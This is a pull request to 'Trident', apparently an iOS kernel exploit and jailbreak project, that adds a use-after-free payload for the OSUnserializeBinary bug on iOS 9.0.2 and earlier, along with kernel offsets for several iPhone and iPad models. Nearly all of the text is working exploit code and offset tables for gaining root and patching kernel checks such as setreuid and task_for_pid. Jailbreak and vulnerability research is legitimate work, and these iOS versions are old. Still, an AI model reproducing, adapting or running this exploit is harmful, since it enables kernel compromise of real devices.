### PR TITLE
Add support for 9.0.x

### DIFF
--- a/Trident/ViewController.m
+++ b/Trident/ViewController.m
@@ -13,7 +13,7 @@
 
 void initialize(void);
 uint32_t leak_kernel_base(void);
-void exploit(uint32_t);
+void exploit(uint32_t, bool);
 
 @interface ViewController ()
 @property (weak, nonatomic) IBOutlet UIButton *button;
@@ -52,8 +52,8 @@ void exploit(uint32_t);
     initialize();
     uint32_t kernel_base = leak_kernel_base();
     printf("kernel base: %p\n", (void *)kernel_base);
-    exploit(kernel_base);
-    
+    exploit(kernel_base, strncmp([[[UIDevice currentDevice] systemVersion] cStringUsingEncoding:NSUTF8StringEncoding], "9.0", 3) == 0);
+
     // Update button.
     self.button.enabled = NO;
     [self.button setTitle:@"w00t root" forState:UIControlStateNormal];

--- a/Trident/exploit.c
+++ b/Trident/exploit.c
@@ -403,7 +403,7 @@ void patch_setreuid(uint32_t kernel_base, mach_port_name_t kernel_task) {
     vm_write(kernel_task, branch_addr, (vm_address_t)&new_branch, 2);
 }
 
-void exploit(uint32_t kernel_base) {
+void exploit(uint32_t kernel_base, bool pre91) {
     pthread_t insert_payload_thread;
     uint32_t payload_ptr = 0x12345678;
     uint32_t args[] = {kernel_base, (uint32_t)&payload_ptr};
@@ -428,9 +428,28 @@ void exploit(uint32_t kernel_base) {
     
     WRITE_IN(data, kOSSerializeDictionary | kOSSerializeEndCollecton | 0x10);
     
-    /* our key is a OSString object that will be freed */
-    WRITE_IN(data, kOSSerializeString | 4);
-    WRITE_IN(data, 0x00327973); // "sy2"
+    if(pre91)
+    {
+        /* pre-9.1 doesn't accept strings as keys, but duplicate keys :D */
+        WRITE_IN(data, kOSSerializeSymbol | 4);
+        WRITE_IN(data, 0x00327973); // "sy2"
+        /* our key is a OSString object that will be freed */
+        WRITE_IN(data, kOSSerializeString | 4);
+        WRITE_IN(data, 0x00327973); // irrelevant
+
+        /* now this will free the string above */
+        WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2"
+        WRITE_IN(data, kOSSerializeBoolean | 1); // lightweight value
+
+        /* and this is the key for the value below */
+        WRITE_IN(data, kOSSerializeObject | 1); // ref to "sy2" again
+    }
+    else
+    {
+        /* our key is a OSString object that will be freed */
+        WRITE_IN(data, kOSSerializeString | 4);
+        WRITE_IN(data, 0x00327973); // "sy2"
+    }
     WRITE_IN(data, kOSSerializeData | 0x14);
     WRITE_IN(data, payload_ptr+PAYLOAD_TO_PEXPLOIT+PEXPLOIT_TO_UAF_PAYLOAD); // [00] address of uaf_payload_buffer
     WRITE_IN(data, 0x41414141);                                              // [04] dummy
@@ -439,8 +458,8 @@ void exploit(uint32_t kernel_base) {
     WRITE_IN(data, kernel_base+find_OSSerializer_serialize()+1);             // [10] address of OSSerializer::serialize (+1)
     
     /* now create a reference to object 1 which is the OSString object that was just freed */
-    WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | 1);
     
+    WRITE_IN(data, kOSSerializeObject | kOSSerializeEndCollecton | (pre91 ? 2 : 1));
     /* get a master port for IOKit API */
     host_get_io_master(mach_host_self(), &master);
     

--- a/Trident/exploit.c
+++ b/Trident/exploit.c
@@ -405,7 +405,7 @@ void patch_setreuid(uint32_t kernel_base, mach_port_name_t kernel_task) {
 
 void exploit(uint32_t kernel_base, bool pre91) {
     pthread_t insert_payload_thread;
-    uint32_t payload_ptr = 0x12345678;
+    volatile uint32_t payload_ptr = 0x12345678;
     uint32_t args[] = {kernel_base, (uint32_t)&payload_ptr};
     char data[4096];
     uint32_t bufpos = 0;

--- a/Trident/offsetfinder.c
+++ b/Trident/offsetfinder.c
@@ -129,6 +129,7 @@ t_target_environment info_to_target_environment(const char *device_model, const 
     determineTarget("iPad3,2", "9.3.2", iPad32_iOS932);
     determineTarget("iPad3,2", "9.3.3", iPad32_iOS933);
     determineTarget("iPad3,2", "9.3.4", iPad32_iOS934);
+    determineTarget("iPad3,3", "9.0.2", iPad33_iOS902);
     determineTarget("iPad3,3", "9.1", iPad33_iOS910);
     determineTarget("iPad3,3", "9.2", iPad33_iOS920);
     determineTarget("iPad3,3", "9.2.1", iPad33_iOS921);
@@ -267,6 +268,7 @@ uint32_t find_OSSerializer_serialize(void) {
         case iPad32_iOS932: return 0x318264;
         case iPad32_iOS933: return 0x318388;
         case iPad32_iOS934: return 0x318388;
+        case iPad33_iOS902: return 0x317de4;
         case iPad33_iOS910: return 0x319450;
         case iPad33_iOS920: return 0x3106fc;
         case iPad33_iOS921: return 0x3107fc;
@@ -402,6 +404,7 @@ uint32_t find_OSSymbol_getMetaClass(void) {
         case iPad32_iOS932: return 0x31aa6c;
         case iPad32_iOS933: return 0x31ab90;
         case iPad32_iOS934: return 0x31ab90;
+        case iPad33_iOS902: return 0x31a5d0;
         case iPad33_iOS910: return 0x31bc3c;
         case iPad33_iOS920: return 0x312e18;
         case iPad33_iOS921: return 0x312f18;
@@ -537,6 +540,7 @@ uint32_t find_calend_gettime(void) {
         case iPad32_iOS932: return 0x1e170;
         case iPad32_iOS933: return 0x1e200;
         case iPad32_iOS934: return 0x1e200;
+        case iPad33_iOS902: return 0x1daec;
         case iPad33_iOS910: return 0x1db34;
         case iPad33_iOS920: return 0x1de84;
         case iPad33_iOS921: return 0x1de60;
@@ -671,6 +675,7 @@ uint32_t find_bufattr_cpx(void) {
         case iPad32_iOS932: return 0xd9848;
         case iPad32_iOS933: return 0xd9838;
         case iPad32_iOS934: return 0xd9838;
+        case iPad33_iOS902: return 0xd97d0;
         case iPad33_iOS910: return 0xd97d0;
         case iPad33_iOS920: return 0xd8750;
         case iPad33_iOS921: return 0xd8750;
@@ -806,6 +811,7 @@ uint32_t find_clock_ops(void) {
         case iPad32_iOS932: return 0x403428;
         case iPad32_iOS933: return 0x403428;
         case iPad32_iOS934: return 0x403428;
+        case iPad33_iOS902: return 0x4043c0;
         case iPad33_iOS910: return 0x4053cc;
         case iPad33_iOS920: return 0x3fc3dc;
         case iPad33_iOS921: return 0x3fc3dc;
@@ -941,6 +947,7 @@ uint32_t find_copyin(void) {
         case iPad32_iOS932: return 0xc76b4;
         case iPad32_iOS933: return 0xc76b4;
         case iPad32_iOS934: return 0xc76b4;
+        case iPad33_iOS902: return 0xc7754;
         case iPad33_iOS910: return 0xc7754;
         case iPad33_iOS920: return 0xc6754;
         case iPad33_iOS921: return 0xc6754;
@@ -1076,6 +1083,7 @@ uint32_t find_bx_lr(void) {
         case iPad32_iOS932: return 0xd984a;
         case iPad32_iOS933: return 0xd983a;
         case iPad32_iOS934: return 0xd983a;
+        case iPad33_iOS902: return 0xd97d2;
         case iPad33_iOS910: return 0xd97d2;
         case iPad33_iOS920: return 0xd8752;
         case iPad33_iOS921: return 0xd8752;
@@ -1211,6 +1219,7 @@ uint32_t find_write_gadget(void) {
         case iPad32_iOS932: return 0xc73e8;
         case iPad32_iOS933: return 0xc73e8;
         case iPad32_iOS934: return 0xc73e8;
+        case iPad33_iOS902: return 0xc7488;
         case iPad33_iOS910: return 0xc7488;
         case iPad33_iOS920: return 0xc6488;
         case iPad33_iOS921: return 0xc6488;
@@ -1346,6 +1355,7 @@ uint32_t find_vm_kernel_addrperm(void) {
         case iPad32_iOS932: return 0x455844;
         case iPad32_iOS933: return 0x455844;
         case iPad32_iOS934: return 0x455844;
+        case iPad33_iOS902: return 0x455fa0;
         case iPad33_iOS910: return 0x457030;
         case iPad33_iOS920: return 0x44e840;
         case iPad33_iOS921: return 0x44e840;
@@ -1481,6 +1491,7 @@ uint32_t find_kernel_pmap(void) {
         case iPad32_iOS932: return 0x3f6454;
         case iPad32_iOS933: return 0x3f6454;
         case iPad32_iOS934: return 0x3f6454;
+        case iPad33_iOS902: return 0x3f7444;
         case iPad33_iOS910: return 0x3f8444;
         case iPad33_iOS920: return 0x3ef444;
         case iPad33_iOS921: return 0x3ef444;
@@ -1616,6 +1627,7 @@ uint32_t find_flush_dcache(void) {
         case iPad32_iOS932: return 0xbc260;
         case iPad32_iOS933: return 0xbc1d4;
         case iPad32_iOS934: return 0xbc1d4;
+        case iPad33_iOS902: return 0xbc9b8;
         case iPad33_iOS910: return 0xbcb7c;
         case iPad33_iOS920: return 0xbb710;
         case iPad33_iOS921: return 0xbb760;
@@ -1751,6 +1763,7 @@ uint32_t find_invalidate_tlb(void) {
         case iPad32_iOS932: return 0xc7440;
         case iPad32_iOS933: return 0xc7440;
         case iPad32_iOS934: return 0xc7440;
+        case iPad33_iOS902: return 0xc74e0;
         case iPad33_iOS910: return 0xc74e0;
         case iPad33_iOS920: return 0xc64e0;
         case iPad33_iOS921: return 0xc64e0;
@@ -1886,6 +1899,7 @@ uint32_t find_task_for_pid(void) {
         case iPad32_iOS932: return 0x2fcd80;
         case iPad32_iOS933: return 0x2fcec0;
         case iPad32_iOS934: return 0x2fcec0;
+        case iPad33_iOS902: return 0x2fca70;
         case iPad33_iOS910: return 0x2fe034;
         case iPad33_iOS920: return 0x2f55b4;
         case iPad33_iOS921: return 0x2f56c4;
@@ -2021,6 +2035,7 @@ uint32_t find_setreuid(void) {
         case iPad32_iOS932: return 0x2a985c;
         case iPad32_iOS933: return 0x2a9988;
         case iPad32_iOS934: return 0x2a9988;
+        case iPad33_iOS902: return 0x2a9754;
         case iPad33_iOS910: return 0x2aa31c;
         case iPad33_iOS920: return 0x2a3ab4;
         case iPad33_iOS921: return 0x2a3bc4;
@@ -2156,6 +2171,7 @@ uint32_t find_setreuid_cred_update(void) {
         case iPad32_iOS932: return 0xe031;
         case iPad32_iOS933: return 0xe031;
         case iPad32_iOS934: return 0xe031;
+        case iPad33_iOS902: return 0xe031;
         case iPad33_iOS910: return 0xe031;
         case iPad33_iOS920: return 0xe031;
         case iPad33_iOS921: return 0xe031;
@@ -2291,6 +2307,7 @@ uint32_t find_pid_check(void) {
         case iPad32_iOS932: return 0x14;
         case iPad32_iOS933: return 0x14;
         case iPad32_iOS934: return 0x14;
+        case iPad33_iOS902: return 0x16;
         case iPad33_iOS910: return 0x16;
         case iPad33_iOS920: return 0x14;
         case iPad33_iOS921: return 0x14;
@@ -2426,6 +2443,7 @@ uint32_t find_posix_check(void) {
         case iPad32_iOS932: return 0x3e;
         case iPad32_iOS933: return 0x3e;
         case iPad32_iOS934: return 0x3e;
+        case iPad33_iOS902: return 0x40;
         case iPad33_iOS910: return 0x40;
         case iPad33_iOS920: return 0x3e;
         case iPad33_iOS921: return 0x3e;
@@ -2561,6 +2579,7 @@ uint32_t find_mac_proc_check(void) {
         case iPad32_iOS932: return 0x1e6;
         case iPad32_iOS933: return 0x1e6;
         case iPad32_iOS934: return 0x1e6;
+        case iPad33_iOS902: return 0x224;
         case iPad33_iOS910: return 0x224;
         case iPad33_iOS920: return 0x1e6;
         case iPad33_iOS921: return 0x1e6;

--- a/Trident/offsetfinder.c
+++ b/Trident/offsetfinder.c
@@ -89,6 +89,7 @@ t_target_environment info_to_target_environment(const char *device_model, const 
     determineTarget("iPad2,4", "9.3.2", iPad24_iOS920);
     determineTarget("iPad2,4", "9.3.3", iPad24_iOS933);
     determineTarget("iPad2,4", "9.3.4", iPad24_iOS934);
+    determineTarget("iPad2,5", "9.0.2", iPad25_iOS902);
     determineTarget("iPad2,5", "9.1", iPad25_iOS910);
     determineTarget("iPad2,5", "9.2", iPad25_iOS920);
     determineTarget("iPad2,5", "9.2.1", iPad25_iOS921);
@@ -252,6 +253,7 @@ uint32_t find_OSSerializer_serialize(void) {
         case iPad24_iOS932: return 0x318264;
         case iPad24_iOS933: return 0x318388;
         case iPad24_iOS934: return 0x318388;
+        case iPad25_iOS902: return 0x317de4;
         case iPad31_iOS910: return 0x319450;
         case iPad31_iOS920: return 0x3106fc;
         case iPad31_iOS921: return 0x3107fc;
@@ -388,6 +390,7 @@ uint32_t find_OSSymbol_getMetaClass(void) {
         case iPad24_iOS932: return 0x31aa6c;
         case iPad24_iOS933: return 0x31ab90;
         case iPad24_iOS934: return 0x31ab90;
+        case iPad25_iOS902: return 0x31a5d0;
         case iPad31_iOS910: return 0x31bc3c;
         case iPad31_iOS920: return 0x312e18;
         case iPad31_iOS921: return 0x312f18;
@@ -524,6 +527,7 @@ uint32_t find_calend_gettime(void) {
         case iPad24_iOS932: return 0x1e170;
         case iPad24_iOS933: return 0x1e200;
         case iPad24_iOS934: return 0x1e200;
+        case iPad25_iOS902: return 0x1daec;
         case iPad31_iOS910: return 0x1db34;
         case iPad31_iOS920: return 0x1de84;
         case iPad31_iOS921: return 0x1de60;
@@ -659,6 +663,7 @@ uint32_t find_bufattr_cpx(void) {
         case iPad24_iOS932: return 0xd9848;
         case iPad24_iOS933: return 0xd9838;
         case iPad24_iOS934: return 0xd9838;
+        case iPad25_iOS902: return 0xd97d0;
         case iPad31_iOS910: return 0xd97d0;
         case iPad31_iOS920: return 0xd8750;
         case iPad31_iOS921: return 0xd8750;
@@ -795,6 +800,7 @@ uint32_t find_clock_ops(void) {
         case iPad24_iOS932: return 0x403428;
         case iPad24_iOS933: return 0x403428;
         case iPad24_iOS934: return 0x403428;
+        case iPad25_iOS902: return 0x4043c0;
         case iPad31_iOS910: return 0x4053cc;
         case iPad31_iOS920: return 0x3fc3dc;
         case iPad31_iOS921: return 0x3fc3dc;
@@ -931,6 +937,7 @@ uint32_t find_copyin(void) {
         case iPad24_iOS932: return 0xc76b4;
         case iPad24_iOS933: return 0xc76b4;
         case iPad24_iOS934: return 0xc76b4;
+        case iPad25_iOS902: return 0xc7754;
         case iPad31_iOS910: return 0xc7754;
         case iPad31_iOS920: return 0xc6754;
         case iPad31_iOS921: return 0xc6754;
@@ -1067,6 +1074,7 @@ uint32_t find_bx_lr(void) {
         case iPad24_iOS932: return 0xd984a;
         case iPad24_iOS933: return 0xd983a;
         case iPad24_iOS934: return 0xd983a;
+        case iPad25_iOS902: return 0xd97d2;
         case iPad31_iOS910: return 0xd97d2;
         case iPad31_iOS920: return 0xd8752;
         case iPad31_iOS921: return 0xd8752;
@@ -1203,6 +1211,7 @@ uint32_t find_write_gadget(void) {
         case iPad24_iOS932: return 0xc73e8;
         case iPad24_iOS933: return 0xc73e8;
         case iPad24_iOS934: return 0xc73e8;
+        case iPad25_iOS902: return 0xc7488;
         case iPad31_iOS910: return 0xc7488;
         case iPad31_iOS920: return 0xc6488;
         case iPad31_iOS921: return 0xc6488;
@@ -1339,6 +1348,7 @@ uint32_t find_vm_kernel_addrperm(void) {
         case iPad24_iOS932: return 0x455844;
         case iPad24_iOS933: return 0x455844;
         case iPad24_iOS934: return 0x455844;
+        case iPad25_iOS902: return 0x455fa0;
         case iPad31_iOS910: return 0x457030;
         case iPad31_iOS920: return 0x44e840;
         case iPad31_iOS921: return 0x44e840;
@@ -1475,6 +1485,7 @@ uint32_t find_kernel_pmap(void) {
         case iPad24_iOS932: return 0x3f6454;
         case iPad24_iOS933: return 0x3f6454;
         case iPad24_iOS934: return 0x3f6454;
+        case iPad25_iOS902: return 0x3f7444;
         case iPad31_iOS910: return 0x3f8444;
         case iPad31_iOS920: return 0x3ef444;
         case iPad31_iOS921: return 0x3ef444;
@@ -1611,6 +1622,7 @@ uint32_t find_flush_dcache(void) {
         case iPad24_iOS932: return 0xbc260;
         case iPad24_iOS933: return 0xbc1d8;
         case iPad24_iOS934: return 0xbc1d4;
+        case iPad25_iOS902: return 0xbc9b8;
         case iPad31_iOS910: return 0xbcb7c;
         case iPad31_iOS920: return 0xbb710;
         case iPad31_iOS921: return 0xbb760;
@@ -1747,6 +1759,7 @@ uint32_t find_invalidate_tlb(void) {
         case iPad24_iOS932: return 0xc7440;
         case iPad24_iOS933: return 0xc7450;
         case iPad24_iOS934: return 0xc7440;
+        case iPad25_iOS902: return 0xc74e0;
         case iPad31_iOS910: return 0xc74e0;
         case iPad31_iOS920: return 0xc64e0;
         case iPad31_iOS921: return 0xc64e0;
@@ -1883,6 +1896,7 @@ uint32_t find_task_for_pid(void) {
         case iPad24_iOS932: return 0x2fcd80;
         case iPad24_iOS933: return 0x2fcec0;
         case iPad24_iOS934: return 0x2fcec0;
+        case iPad25_iOS902: return 0x2fca70;
         case iPad31_iOS910: return 0x2fe034;
         case iPad31_iOS920: return 0x2f55b4;
         case iPad31_iOS921: return 0x2f56c4;
@@ -2019,6 +2033,7 @@ uint32_t find_setreuid(void) {
         case iPad24_iOS932: return 0x2a985c;
         case iPad24_iOS933: return 0x2a9988;
         case iPad24_iOS934: return 0x2a9988;
+        case iPad25_iOS902: return 0x2a9754;
         case iPad31_iOS910: return 0x2aa31c;
         case iPad31_iOS920: return 0x2a3ab4;
         case iPad31_iOS921: return 0x2a3bc4;
@@ -2155,6 +2170,7 @@ uint32_t find_setreuid_cred_update(void) {
         case iPad24_iOS932: return 0xe031;
         case iPad24_iOS933: return 0xe031;
         case iPad24_iOS934: return 0xe031;
+        case iPad25_iOS902: return 0xe031;
         case iPad31_iOS910: return 0xe031;
         case iPad31_iOS920: return 0xe031;
         case iPad31_iOS921: return 0xe031;
@@ -2291,6 +2307,7 @@ uint32_t find_pid_check(void) {
         case iPad24_iOS932: return 0x14;
         case iPad24_iOS933: return 0x14;
         case iPad24_iOS934: return 0x14;
+        case iPad25_iOS902: return 0x16;
         case iPad31_iOS910: return 0x16;
         case iPad31_iOS920: return 0x14;
         case iPad31_iOS921: return 0x14;
@@ -2427,6 +2444,7 @@ uint32_t find_posix_check(void) {
         case iPad24_iOS932: return 0x3e;
         case iPad24_iOS933: return 0x3e;
         case iPad24_iOS934: return 0x3e;
+        case iPad25_iOS902: return 0x40;
         case iPad31_iOS910: return 0x40;
         case iPad31_iOS920: return 0x3e;
         case iPad31_iOS921: return 0x3e;
@@ -2563,6 +2581,7 @@ uint32_t find_mac_proc_check(void) {
         case iPad24_iOS932: return 0x1e6;
         case iPad24_iOS933: return 0x1e6;
         case iPad24_iOS934: return 0x1e6;
+        case iPad25_iOS902: return 0x224;
         case iPad31_iOS910: return 0x224;
         case iPad31_iOS920: return 0x1e6;
         case iPad31_iOS921: return 0x1e6;

--- a/Trident/offsetfinder.c
+++ b/Trident/offsetfinder.c
@@ -16,6 +16,7 @@
 t_target_environment target_environment = NotSupported;
 
 t_target_environment info_to_target_environment(const char *device_model, const char *system_version) {
+    determineTarget("iPhone4,1", "9.0.2", iPhone41_iOS902);
     determineTarget("iPhone4,1", "9.1", iPhone41_iOS910);
     determineTarget("iPhone4,1", "9.2", iPhone41_iOS920);
     determineTarget("iPhone4,1", "9.2.1", iPhone41_iOS921);
@@ -177,6 +178,7 @@ void init_target_environment(const char *device_model, const char *system_versio
 
 uint32_t find_OSSerializer_serialize(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x317de4;
         case iPhone41_iOS910: return 0x319450;
         case iPhone41_iOS920: return 0x3106fc;
         case iPhone41_iOS921: return 0x3107fc;
@@ -311,6 +313,7 @@ uint32_t find_OSSerializer_serialize(void) {
 
 uint32_t find_OSSymbol_getMetaClass(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x31a5d0;
         case iPhone41_iOS910: return 0x31bc3c;
         case iPhone41_iOS920: return 0x312e18;
         case iPhone41_iOS921: return 0x312f18;
@@ -445,6 +448,7 @@ uint32_t find_OSSymbol_getMetaClass(void) {
 
 uint32_t find_calend_gettime(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x1daec;
         case iPhone41_iOS910: return 0x1db34;
         case iPhone41_iOS920: return 0x1de84;
         case iPhone41_iOS921: return 0x1de60;
@@ -579,6 +583,7 @@ uint32_t find_calend_gettime(void) {
 
 uint32_t find_bufattr_cpx(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xd97d0;
         case iPhone41_iOS910: return 0xd97d0;
         case iPhone41_iOS920: return 0xd8750;
         case iPhone41_iOS921: return 0xd8750;
@@ -712,6 +717,7 @@ uint32_t find_bufattr_cpx(void) {
 
 uint32_t find_clock_ops(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x4043cc;
         case iPhone41_iOS910: return 0x4053cc;
         case iPhone41_iOS920: return 0x3fc3dc;
         case iPhone41_iOS921: return 0x3fc3dc;
@@ -846,6 +852,7 @@ uint32_t find_clock_ops(void) {
 
 uint32_t find_copyin(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xc7754;
         case iPhone41_iOS910: return 0xc7754;
         case iPhone41_iOS920: return 0xc6754;
         case iPhone41_iOS921: return 0xc6754;
@@ -980,6 +987,7 @@ uint32_t find_copyin(void) {
 
 uint32_t find_bx_lr(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xd97d2;
         case iPhone41_iOS910: return 0xd97d2;
         case iPhone41_iOS920: return 0xd8752;
         case iPhone41_iOS921: return 0xd8752;
@@ -1114,6 +1122,7 @@ uint32_t find_bx_lr(void) {
 
 uint32_t find_write_gadget(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xc7488;
         case iPhone41_iOS910: return 0xc7488;
         case iPhone41_iOS920: return 0xc6488;
         case iPhone41_iOS921: return 0xc6488;
@@ -1248,6 +1257,7 @@ uint32_t find_write_gadget(void) {
 
 uint32_t find_vm_kernel_addrperm(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x455fa0;
         case iPhone41_iOS910: return 0x457030;
         case iPhone41_iOS920: return 0x44e840;
         case iPhone41_iOS921: return 0x44e840;
@@ -1382,6 +1392,7 @@ uint32_t find_vm_kernel_addrperm(void) {
 
 uint32_t find_kernel_pmap(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x3f7444;
         case iPhone41_iOS910: return 0x3f8444;
         case iPhone41_iOS920: return 0x3ef444;
         case iPhone41_iOS921: return 0x3ef444;
@@ -1516,6 +1527,7 @@ uint32_t find_kernel_pmap(void) {
 
 uint32_t find_flush_dcache(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xbc9b8;
         case iPhone41_iOS910: return 0xbcb7c;
         case iPhone41_iOS920: return 0xbb710;
         case iPhone41_iOS921: return 0xbb760;
@@ -1650,6 +1662,7 @@ uint32_t find_flush_dcache(void) {
 
 uint32_t find_invalidate_tlb(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xc74e0;
         case iPhone41_iOS910: return 0xc74e0;
         case iPhone41_iOS920: return 0xc64e0;
         case iPhone41_iOS921: return 0xc64e0;
@@ -1784,6 +1797,7 @@ uint32_t find_invalidate_tlb(void) {
 
 uint32_t find_task_for_pid(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x2fca70;
         case iPhone41_iOS910: return 0x2fe034;
         case iPhone41_iOS920: return 0x2f55b4;
         case iPhone41_iOS921: return 0x2f56c4;
@@ -1918,6 +1932,7 @@ uint32_t find_task_for_pid(void) {
 
 uint32_t find_setreuid(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x2a9754;
         case iPhone41_iOS910: return 0x2aa31c;
         case iPhone41_iOS920: return 0x2a3ab4;
         case iPhone41_iOS921: return 0x2a3bc4;
@@ -2052,6 +2067,7 @@ uint32_t find_setreuid(void) {
 
 uint32_t find_setreuid_cred_update(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0xe040;
         case iPhone41_iOS910: return 0xe031;
         case iPhone41_iOS920: return 0xe031;
         case iPhone41_iOS921: return 0xe031;
@@ -2186,6 +2202,7 @@ uint32_t find_setreuid_cred_update(void) {
 
 uint32_t find_pid_check(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x16;
         case iPhone41_iOS910: return 0x14;
         case iPhone41_iOS920: return 0x14;
         case iPhone41_iOS921: return 0x14;
@@ -2320,6 +2337,7 @@ uint32_t find_pid_check(void) {
 
 uint32_t find_posix_check(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x40;
         case iPhone41_iOS910: return 0x3e;
         case iPhone41_iOS920: return 0x3e;
         case iPhone41_iOS921: return 0x3e;
@@ -2454,6 +2472,7 @@ uint32_t find_posix_check(void) {
 
 uint32_t find_mac_proc_check(void) {
     switch (target_environment) {
+        case iPhone41_iOS902: return 0x224;
         case iPhone41_iOS910: return 0x224;
         case iPhone41_iOS920: return 0x1e6;
         case iPhone41_iOS921: return 0x1e6;

--- a/Trident/offsetfinder.h
+++ b/Trident/offsetfinder.h
@@ -13,6 +13,7 @@
 
 typedef enum {
     NotSupported,
+    iPhone41_iOS902,
     iPhone41_iOS910,
     iPhone41_iOS920,
     iPhone41_iOS921,

--- a/Trident/offsetfinder.h
+++ b/Trident/offsetfinder.h
@@ -126,6 +126,7 @@ typedef enum {
     iPad32_iOS932,
     iPad32_iOS933,
     iPad32_iOS934,
+    iPad33_iOS902,
     iPad33_iOS910,
     iPad33_iOS920,
     iPad33_iOS921,

--- a/Trident/offsetfinder.h
+++ b/Trident/offsetfinder.h
@@ -86,6 +86,7 @@ typedef enum {
     iPad24_iOS932,
     iPad24_iOS933,
     iPad24_iOS934,
+    iPad25_iOS902,
     iPad25_iOS910,
     iPad25_iOS920,
     iPad25_iOS921,


### PR DESCRIPTION
This pull request adds an alternative OSUnserializeBinary payload that works on iOS versions 9.0.2 and lower.

In addition, it adds offsets for:

- iPhone4,1 (iPhone 4s) on 9.0.2
- iPad3,3 (iPad 3) on 9.0.2
- iPad2,5 (iPad mini) on 9.0.2 (identical to iPad3,3 ones)